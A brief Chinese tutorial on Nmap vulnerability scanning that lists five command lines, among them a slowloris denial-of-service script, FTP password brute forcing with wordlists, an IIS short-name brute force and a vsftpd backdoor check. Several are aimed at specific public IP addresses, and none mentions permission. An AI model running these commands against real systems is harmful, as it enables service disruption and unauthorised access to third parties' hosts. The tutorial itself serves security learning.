nmap如何扫描漏洞?nmap扫描漏洞教程
Nmap是一款应用广泛的端口扫描工具,map软件内置了多种检测机制,可以轻松的辨识主机,发现其是否处于活动状态,为网络管理员提供了便利。那么使用该软件怎么扫描漏洞呢?接下来和大家分享nmap扫描漏洞教程。 具体如下: 1、http 拒绝服务:nmap --max-parallelism 800--script http-slowloris scanme.nmap.org 2、IIS 短文件泄露:nmap -p 8080 --script http-iis-short-name-brute 61.142.64.176 3、ftp弱口令暴力破解:nmap --script ftp-brute --script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/dirtionary/usernames.txt,brute.useraspass=true,passdb=/root/dirtionary/passwords.txt,brute.threads=3,brute.delay=6 203.195.139.153 4、检测CVE-2011-2523中的ftp-vsftpd-backdoor:nmap -T2 --script ftp-vsftpd-backdoor 211.139.201.240 5、验证http中开启的-methods 方法:nmap -T3 --script http-methods --script-args http.test-all=true,http.url-path=/www.haoshangjia.com |